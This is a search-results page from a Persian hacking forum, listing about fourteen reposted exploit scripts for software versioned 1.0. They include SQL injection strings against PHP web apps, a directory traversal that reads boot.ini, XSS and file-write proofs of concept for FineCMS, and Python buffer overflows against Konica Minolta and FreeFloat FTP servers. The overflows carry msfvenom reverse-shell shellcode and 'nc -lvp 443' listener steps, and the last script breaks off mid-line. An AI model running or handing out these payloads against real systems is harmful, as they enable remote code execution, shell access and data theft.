امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های '1.0'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

17 نتیجه پیدا شد

  1. # Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC) # Author: Gionathan "John" Reale # Discovey Date: 2018-08-29 # Homepage: https://www.hdtune.com/ # Software Link: https://www.hdtune.com/download.html # Tested Version: v1.0 # Tested on OS: Windows 7 32-bit # Steps to Reproduce: Run the python exploit script, it will create a new # file with the name "exploit.txt". Copy the content of the new file "exploit.txt". # Now start the program. Now when you are inside of the program click "File" > "Options". In the field: "Folder / filename" paste the copied content from "exploit.txt". # Now click "OK" and see a crash! #!/usr/bin/python buffer = "A" * 6000 payload = buffer try: f=open("exploit.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"
  2. # Title: Konica Minolta FTP Utility - Remote Command Execution # Date : 20/09/2015 # Author: R-73eN # Software: Konica Minolta FTP Utility v1.0 # Tested: Windows XP SP3 # Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip # Every command is vulnerable to buffer overflow. import socket import struct shellcode = ""#msfvenom -p windows/exec cmd=calc.exe -f python -b "\x00\x0d\x0a\x3d\x5c\x2f" shellcode += "\xbd\xfe\xbd\x27\xc9\xda\xd8\xd9\x74\x24\xf4\x5e\x29" shellcode += "\xc9\xb1\x31\x31\x6e\x13\x83\xee\xfc\x03\x6e\xf1\x5f" shellcode += "\xd2\x35\xe5\x22\x1d\xc6\xf5\x42\x97\x23\xc4\x42\xc3" shellcode += "\x20\x76\x73\x87\x65\x7a\xf8\xc5\x9d\x09\x8c\xc1\x92" shellcode += "\xba\x3b\x34\x9c\x3b\x17\x04\xbf\xbf\x6a\x59\x1f\xfe" shellcode += "\xa4\xac\x5e\xc7\xd9\x5d\x32\x90\x96\xf0\xa3\x95\xe3" shellcode += "\xc8\x48\xe5\xe2\x48\xac\xbd\x05\x78\x63\xb6\x5f\x5a" shellcode += "\x85\x1b\xd4\xd3\x9d\x78\xd1\xaa\x16\x4a\xad\x2c\xff" shellcode += "\x83\x4e\x82\x3e\x2c\xbd\xda\x07\x8a\x5e\xa9\x71\xe9" shellcode += "\xe3\xaa\x45\x90\x3f\x3e\x5e\x32\xcb\x98\xba\xc3\x18" shellcode += "\x7e\x48\xcf\xd5\xf4\x16\xd3\xe8\xd9\x2c\xef\x61\xdc" shellcode += "\xe2\x66\x31\xfb\x26\x23\xe1\x62\x7e\x89\x44\x9a\x60" shellcode += "\x72\x38\x3e\xea\x9e\x2d\x33\xb1\xf4\xb0\xc1\xcf\xba" shellcode += "\xb3\xd9\xcf\xea\xdb\xe8\x44\x65\x9b\xf4\x8e\xc2\x53" shellcode += "\xbf\x93\x62\xfc\x66\x46\x37\x61\x99\xbc\x7b\x9c\x1a" shellcode += "\x35\x03\x5b\x02\x3c\x06\x27\x84\xac\x7a\x38\x61\xd3" shellcode += "\x29\x39\xa0\xb0\xac\xa9\x28\x19\x4b\x4a\xca\x65" banner = "" banner +=" ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner nSEH = "\xEB\x13\x90\x90" SEH = struct.pack('<L',0x1220401E) evil = "A" * 8343 + nSEH + SEH + "\x90" * 22 + shellcode +"D" * (950 - len(shellcode)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server = raw_input('Enter IP : ') s.connect((server, 21)) a = s.recv(1024) print ' [+] ' + a s.send('User ' + evil ) print '[+] https://www.infogen.al/ [+]'
  3. /* --------------------------------------------------------------------- Konica Minolta FTP Utility directory traversal vulnerability Url: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip Author: shinnai mail: shinnai[at]autistici[dot]org site: http://www.shinnai.altervista.org/ Poc: http://shinnai.altervista.org/exploits/SH-0024-20150922.html --------------------------------------------------------------------- */ <?php $local_file = 'boot.ini.txt'; $server_file = '..\..\..\..\..\..\..\..\boot.ini'; $conn_id = ftp_connect($ftp_server); $login_result = ftp_login($conn_id, "anonymous", "anonymous"); if (ftp_get($conn_id, $local_file, $server_file, FTP_BINARY)) { echo "Successfully written to $local_file\n"; } else { echo "There was a problem\n"; } ftp_close($conn_id); ?> ---------------------------------------------------------------------
  4. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  5. # # # # # # Exploit Title: Joomla! Component Bargain Product VM3 1.0 - SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: https://www.weborange.eu/ # Software Link: https://www.weborange.eu/extensions/index.php/extensions-vm3/bargain-product-vm3-detail # Demo: http://www.weborange.eu/demo/index.php/bargain-product # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=brainy&product_id=[SQL] # http://localhost/[PATH]/index.php/component/pazzari_vm3/?view=alice&product_id=[SQL] # # 17+OR+0x3231323232+/*!00005Group*/+BY+/*!00005ConcAT_WS*/(0x3a,0x496873616e2053656e63616e,VersioN(),FLooR(RaND(0)*0x32))+/*!00005havinG*/+min(0)+OR+0x31 # # Etc.. # # # # #
  6. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  7. Hacking

    # # # # # # Exploit Title: FineCMS 1.0 Multiple Vulnerabilities # Dork: N/A # Date: 29.08.2017 # Vendor Homepage : http://mvc.net.pl/ # Software Link: https://github.com/andrzuk/FineCMS # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: sohaip-hackerDZ # Author Web: http://www.hacker-ar.com # Author Social: @sohaip_hackerDZ # # # # # Reflected XSS in get_image.php Technical Description: file /application/lib/ajax/get_image.php the $_POST['id'] and $_POST['name'] and $_GET['folder'] without any validated, sanitised or output encoded. Proof of Concept(PoC) http://your_finecms/application/lib/ajax/get_image.php?folder=1 POST: id=1"><script>alert(1)</script>&name=1 Arbitrary File Modify Technical Description: The base function for modify the template can modify the filename,this leads to the Arbitrary File Modify, who could allow attacker getshell. file /appalication/core/controller/template.php line50-line53 follow function save() file /appalication/core/model/template.php line26-line48 if file exists, we can modify it whihout any limit. insterestingly, there are two more Vulnerability for same function in different files. file /appalication/core/model/style.php line26-line48 file /appalication/core/model/script.php line26-line48 Proof of Concept(PoC) http://your_finecms/index.php?route=template http://your_finecms/index.php?route=style http://your_finecms/index.php?route=script POST: contents=<?php phpinfo();?>&filename={any exist filename}&savabutton=Zapisz Authenticated SQL injection all FineCMS use PDO to connect the mysql server, so all the data without any validated, sanitised or output encoded injection database.but in application/core/controller/excludes.php, the website author use mysqli to connect mysql server.the lead SQL injection, who could allow attacker use some payload to get data in database. Technical Description: file application/core/controller/excludes.php line75, the visitor_ip insert into database without any validated, sanitised or output encoded. file /stat/get_stat_data.php line30 the sql inject into sql_query and execute. Proof of Concept(PoC) http://your_finecms/index.php?route=excludes&action=add POST: visitor_ip=1%27%2Csleep%281%29%2C%271&save_button=Zapisz and view http://your_finecms/stat/get_stat_data.php,we can feel website loading sleep. Stored XSS in images.php FineCMS allow admin to upload image into gallery, and it will show image data into pages, but some data will output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: when we upload the file file application/core/controller/images.php line87 and follow the function add() file application/core/model/images.php line78 if filetype startwith "image",the filetype will insert into database when we view the detail of the images file application/lib/generators/view.php line106, somethings will output into pages. Proof of Concept(PoC) view the http://your_finecms/index.php?route=images&action=add and upload picture modify the picture's filetype view the detail of picture Because of the vulnerability also in edit detail page. so you also can use edit to insert Script code in pages. http://your_finecms/index.php?route=images&action=edit&id=15 view the detail of picture Stored XSS in visitors.php FineCMS stores all the visitors the visit url, but in detail of log they output into pages without any validated, sanitised or output encoded. they allow attacker Cross Site Scripting. Technical Description: just like last vulnerability. Proof of Concept(PoC) visit any page with js script code. such as index.php?route=images&action=view&id=14'"><script>alert(1)</script>
  8. Hacking

    # # # # # # Exploit Title: WYSIWYG HTML Editor PRO 1.0 - Arbitrary File Download # Dork: N/A # Date: 28.08.2017 # Vendor Homepage: http://nelliwinne.net/ # Software Link: https://codecanyon.net/item/wysiwyg-html-editor-pro-php-based-editor-with-image-uploader-and-more/19012022 # Demo: http://codecanyon.nelliwinne.net/WYSIWYGEditorPRO/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The security obligation allows an attacker to arbitrary download files.. # # Vulnerable Source: # # ............. # <?php # $file = base64_decode($_GET['id']); # # if (file_exists($file)) { # header('Content-Description: File Transfer'); # header('Content-Type: application/octet-stream'); # header('Content-Disposition: attachment; filename="'.basename($file).'"'); # header('Expires: 0'); # header('Cache-Control: must-revalidate'); # header('Pragma: public'); # header('Content-Length: ' . filesize($file)); # readfile($file); # exit; # } # ?> # ............. # Proof of Concept: # # http://localhost/[PATH]/wysiwyg/download.php?id=[FILENAME_to_BASE64] # # Etc... # # # # #
  9. Hacking

    # # # # # # Exploit Title: iGreeting Cards 1.0 - SQL Injection # Dork: N/A # Date: 04.09.2017 # Vendor Homepage: http://coryapp.com/ # Software Link: http://coryapp.com/?product&index # Demo: http://coryapp.com/demo/greetingcards/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?index&search&k=[SQL] # # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+- # # http://localhost/[PATH]/index.php?index&index&p=[SQL] # # http://localhost/[PATH]/index.php?category&index&id=[SQL] # # Etc.. # # # # #
  10. Hacking

    # # # # # # Exploit Title: The Car Project 1.0 - SQL Injection # Dork: N/A # Date: 05.09.2017 # Vendor Homepage: http://thecarproject.org/ # Software Link: http://thecarproject.org/thecarproject.zip # Demo: http://www.thecarproject.org/cp # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Vulnerable Source: # # <?php # ............. # if(isset($_GET['car_id'])) { # $motor_id = $_GET['car_id']; # if (!empty($_GET['man_id'])){ # $manufacturer_id = $_GET['man_id']; # } # ............. # ?> # # Proof of Concept: # # http://localhost/[PATH]/info.php?car_id=[SQL] # # -5+/*!11122uNiOn*/(/*!11122sELect*/0x283129,0x283229,/*!11122CONCAT_WS*/(0x203a20,/*!11122USER*/(),/*!11122DATABASE*/(),VERSION()),0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,(44),0x28343529,0x28343629,0x28343729,0x28343829,0x28343929) # # Etc.. # # # # #
  11. Hacking

    #!/usr/bin/env python # -*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server RENAME Command Buffer Overflow Exploit # Date: 29/10/2016 # Exploit Author: Eagleblack # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 Spanish version x86 # CVE : N/A #Description: FreeFloat FTP server allow login as root without a user and password, this vulnerability allow to an attacker login and send a # long chain of characters that overflow the buffer, when the attacker knows the exact number that overwritten the EIP registry # he can take possession of the application and send a malicious code (payload) to the ESP stack pointer that allow obtain # a remote code execution on the system that is running the FTP Server, in this case Windows XP. import socket ret = "\x5B\x96\xDC\x77" #ADVAPI32.dll this dll have a jump to ESP stack pointer #Metasploit shellcode: #msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1" "\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c" "\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c" "\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81" "\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d" "\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c" "\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1" "\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40" "\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66" "\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72" "\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec" "\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b" "\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c" "\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c" "\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f" "\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01" "\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03" "\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff" "\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e" "\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e" "\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8" "\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f" "\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6" "\x33\x93\xbd\x45\x33\xb6") buffer = '\x41'* 245 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 245 print "Sending Buffer" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target s.recv(1024) #FTPBanner s.send('USER \r\n') #Sending USER (Null user) s.recv(1024) s.send('PASS \r\n') #Sending Password (Null password) s.recv(1024) s.send('RENAME' + buffer +'\r\n') s.close()
  12. Hacking

    #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server HOST Command Buffer Overflow Exploit # Date: 30/10/2016 # Exploit Author: Cybernetic # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.00 # Tested on: Windows XP Profesional SP3 ESP x86 # CVE : N/A import socket, os, sys ret="\xC7\x31\x6B\x7E" #Shell32.dll 7E6B31C7 #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c #nc -lvp 443 #Send exploit shellcode=("\xbb\x89\x62\x48\xda\xdb\xda\xd9\x74\x24\xf4\x5a\x33\xc9\xb1" "\x52\x31\x5a\x12\x03\x5a\x12\x83\x4b\x66\xaa\x2f\xb7\x8f\xa8" "\xd0\x47\x50\xcd\x59\xa2\x61\xcd\x3e\xa7\xd2\xfd\x35\xe5\xde" "\x76\x1b\x1d\x54\xfa\xb4\x12\xdd\xb1\xe2\x1d\xde\xea\xd7\x3c" "\x5c\xf1\x0b\x9e\x5d\x3a\x5e\xdf\x9a\x27\x93\x8d\x73\x23\x06" "\x21\xf7\x79\x9b\xca\x4b\x6f\x9b\x2f\x1b\x8e\x8a\xfe\x17\xc9" "\x0c\x01\xfb\x61\x05\x19\x18\x4f\xdf\x92\xea\x3b\xde\x72\x23" "\xc3\x4d\xbb\x8b\x36\x8f\xfc\x2c\xa9\xfa\xf4\x4e\x54\xfd\xc3" "\x2d\x82\x88\xd7\x96\x41\x2a\x33\x26\x85\xad\xb0\x24\x62\xb9" "\x9e\x28\x75\x6e\x95\x55\xfe\x91\x79\xdc\x44\xb6\x5d\x84\x1f" "\xd7\xc4\x60\xf1\xe8\x16\xcb\xae\x4c\x5d\xe6\xbb\xfc\x3c\x6f" "\x0f\xcd\xbe\x6f\x07\x46\xcd\x5d\x88\xfc\x59\xee\x41\xdb\x9e" "\x11\x78\x9b\x30\xec\x83\xdc\x19\x2b\xd7\x8c\x31\x9a\x58\x47" "\xc1\x23\x8d\xc8\x91\x8b\x7e\xa9\x41\x6c\x2f\x41\x8b\x63\x10" "\x71\xb4\xa9\x39\x18\x4f\x3a\x86\x75\x4e\xde\x6e\x84\x50\x1f" "\xd4\x01\xb6\x75\x3a\x44\x61\xe2\xa3\xcd\xf9\x93\x2c\xd8\x84" "\x94\xa7\xef\x79\x5a\x40\x85\x69\x0b\xa0\xd0\xd3\x9a\xbf\xce" "\x7b\x40\x2d\x95\x7b\x0f\x4e\x02\x2c\x58\xa0\x5b\xb8\x74\x9b" "\xf5\xde\x84\x7d\x3d\x5a\x53\xbe\xc0\x63\x16\xfa\xe6\x73\xee" "\x03\xa3\x27\xbe\x55\x7d\x91\x78\x0c\xcf\x4b\xd3\xe3\x99\x1b" "\xa2\xcf\x19\x5d\xab\x05\xec\x81\x1a\xf0\xa9\xbe\x93\x94\x3d" "\xc7\xc9\x04\xc1\x12\x4a\x34\x88\x3e\xfb\xdd\x55\xab\xb9\x83" "\x65\x06\xfd\xbd\xe5\xa2\x7e\x3a\xf5\xc7\x7b\x06\xb1\x34\xf6" "\x17\x54\x3a\xa5\x18\x7d") shell= '\x90'*30 + shellcode buffer='\x41'*247 + ret + shell + '\x43'*(696-len(shell)) print "Sending Buffer" s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('10.10.10.10',21)) s.recv(1024) s.send('USER test \r\n') s.recv(1024) s.send('PASS test \r\n') s.recv(1024) s.send('HOST' +buffer+ '\r\n') s.close() print "Attack Buffer Overflow Successfully Executed"
  13. Hacking

    #!/usr/bin/env python # -*- coding: utf-8 -*- import socket #Exploit Title: FreeFloat FTP Server Buffer Overflow RMD command #Date: 29 Octubre 2016 #Exploit Author: Karri93 #Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #Version: 1.0 #Tested on: Windows XP Profesional SP3 Spanish x86 #Shellcode Metasploit: #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.7 LPORT=443 -b '\x00\x0A\x0D' -f -c #nc -lvp 443 ret= "\x2F\x1D\xF1\x77" #GDI32.dll shellcode=("\xd9\xc4\xd9\x74\x24\xf4\x5b\x33\xc9\xb1\x52\xba\x9b\x84\x71" "\xb0\x83\xc3\x04\x31\x53\x13\x03\xc8\x97\x93\x45\x12\x7f\xd1" "\xa6\xea\x80\xb6\x2f\x0f\xb1\xf6\x54\x44\xe2\xc6\x1f\x08\x0f" "\xac\x72\xb8\x84\xc0\x5a\xcf\x2d\x6e\xbd\xfe\xae\xc3\xfd\x61" "\x2d\x1e\xd2\x41\x0c\xd1\x27\x80\x49\x0c\xc5\xd0\x02\x5a\x78" "\xc4\x27\x16\x41\x6f\x7b\xb6\xc1\x8c\xcc\xb9\xe0\x03\x46\xe0" "\x22\xa2\x8b\x98\x6a\xbc\xc8\xa5\x25\x37\x3a\x51\xb4\x91\x72" "\x9a\x1b\xdc\xba\x69\x65\x19\x7c\x92\x10\x53\x7e\x2f\x23\xa0" "\xfc\xeb\xa6\x32\xa6\x78\x10\x9e\x56\xac\xc7\x55\x54\x19\x83" "\x31\x79\x9c\x40\x4a\x85\x15\x67\x9c\x0f\x6d\x4c\x38\x4b\x35" "\xed\x19\x31\x98\x12\x79\x9a\x45\xb7\xf2\x37\x91\xca\x59\x50" "\x56\xe7\x61\xa0\xf0\x70\x12\x92\x5f\x2b\xbc\x9e\x28\xf5\x3b" "\xe0\x02\x41\xd3\x1f\xad\xb2\xfa\xdb\xf9\xe2\x94\xca\x81\x68" "\x64\xf2\x57\x3e\x34\x5c\x08\xff\xe4\x1c\xf8\x97\xee\x92\x27" "\x87\x11\x79\x40\x22\xe8\xea\xaf\x1b\xf3\xed\x47\x5e\xf3\xf0" "\x2c\xd7\x15\x98\x42\xbe\x8e\x35\xfa\x9b\x44\xa7\x03\x36\x21" "\xe7\x88\xb5\xd6\xa6\x78\xb3\xc4\x5f\x89\x8e\xb6\xf6\x96\x24" "\xde\x95\x05\xa3\x1e\xd3\x35\x7c\x49\xb4\x88\x75\x1f\x28\xb2" "\x2f\x3d\xb1\x22\x17\x85\x6e\x97\x96\x04\xe2\xa3\xbc\x16\x3a" "\x2b\xf9\x42\x92\x7a\x57\x3c\x54\xd5\x19\x96\x0e\x8a\xf3\x7e" "\xd6\xe0\xc3\xf8\xd7\x2c\xb2\xe4\x66\x99\x83\x1b\x46\x4d\x04" "\x64\xba\xed\xeb\xbf\x7e\x1d\xa6\x9d\xd7\xb6\x6f\x74\x6a\xdb" "\x8f\xa3\xa9\xe2\x13\x41\x52\x11\x0b\x20\x57\x5d\x8b\xd9\x25" "\xce\x7e\xdd\x9a\xef\xaa") buffer= '\x90'*30 + shellcode buffer1= '\x41' * 248 + ret + buffer + '\x43'*(696-len(buffer)) print "Sending..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.1.150',21)) s.recv(1024) s.send('USER free\r\n') s.recv(1024) s.send('PASS free\r\n') s.recv(1024) s.send('RMD' + buffer1 + '\r\n') s.close()
  14. Hacking

    #!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: FreeFloat FTP Server BoF ABOR Command # Date: 29/10/2016 # Exploit Author: Ger # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Version: 1.0 # Tested on: Windows XP Profesional V. 2002 Service Pack 3 # CVE : n/a import socket #shellcode with metasploit #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.74.132 LPORT=443 -b '\x00\x0d\x0a' -f c #nc -lvp 443 #send the exploit ret='\x73\x18\x6E\x74' #MSCTF.dll shellcode=("\xdd\xc6\xd9\x74\x24\xf4\x5d\xb8\x2a\xb4\x5a\x74\x29\xc9\xb1" "\x52\x31\x45\x17\x03\x45\x17\x83\xef\xb0\xb8\x81\x13\x50\xbe" "\x6a\xeb\xa1\xdf\xe3\x0e\x90\xdf\x90\x5b\x83\xef\xd3\x09\x28" "\x9b\xb6\xb9\xbb\xe9\x1e\xce\x0c\x47\x79\xe1\x8d\xf4\xb9\x60" "\x0e\x07\xee\x42\x2f\xc8\xe3\x83\x68\x35\x09\xd1\x21\x31\xbc" "\xc5\x46\x0f\x7d\x6e\x14\x81\x05\x93\xed\xa0\x24\x02\x65\xfb" "\xe6\xa5\xaa\x77\xaf\xbd\xaf\xb2\x79\x36\x1b\x48\x78\x9e\x55" "\xb1\xd7\xdf\x59\x40\x29\x18\x5d\xbb\x5c\x50\x9d\x46\x67\xa7" "\xdf\x9c\xe2\x33\x47\x56\x54\x9f\x79\xbb\x03\x54\x75\x70\x47" "\x32\x9a\x87\x84\x49\xa6\x0c\x2b\x9d\x2e\x56\x08\x39\x6a\x0c" "\x31\x18\xd6\xe3\x4e\x7a\xb9\x5c\xeb\xf1\x54\x88\x86\x58\x31" "\x7d\xab\x62\xc1\xe9\xbc\x11\xf3\xb6\x16\xbd\xbf\x3f\xb1\x3a" "\xbf\x15\x05\xd4\x3e\x96\x76\xfd\x84\xc2\x26\x95\x2d\x6b\xad" "\x65\xd1\xbe\x62\x35\x7d\x11\xc3\xe5\x3d\xc1\xab\xef\xb1\x3e" "\xcb\x10\x18\x57\x66\xeb\xcb\x98\xdf\xb9\x8f\x71\x22\x3d\x91" "\x3a\xab\xdb\xfb\x2c\xfa\x74\x94\xd5\xa7\x0e\x05\x19\x72\x6b" "\x05\x91\x71\x8c\xc8\x52\xff\x9e\xbd\x92\x4a\xfc\x68\xac\x60" "\x68\xf6\x3f\xef\x68\x71\x5c\xb8\x3f\xd6\x92\xb1\xd5\xca\x8d" "\x6b\xcb\x16\x4b\x53\x4f\xcd\xa8\x5a\x4e\x80\x95\x78\x40\x5c" "\x15\xc5\x34\x30\x40\x93\xe2\xf6\x3a\x55\x5c\xa1\x91\x3f\x08" "\x34\xda\xff\x4e\x39\x37\x76\xae\x88\xee\xcf\xd1\x25\x67\xd8" "\xaa\x5b\x17\x27\x61\xd8\x27\x62\x2b\x49\xa0\x2b\xbe\xcb\xad" "\xcb\x15\x0f\xc8\x4f\x9f\xf0\x2f\x4f\xea\xf5\x74\xd7\x07\x84" "\xe5\xb2\x27\x3b\x05\x97") buffer='\x90'*20 + shellcode buffer1='\x41'*247 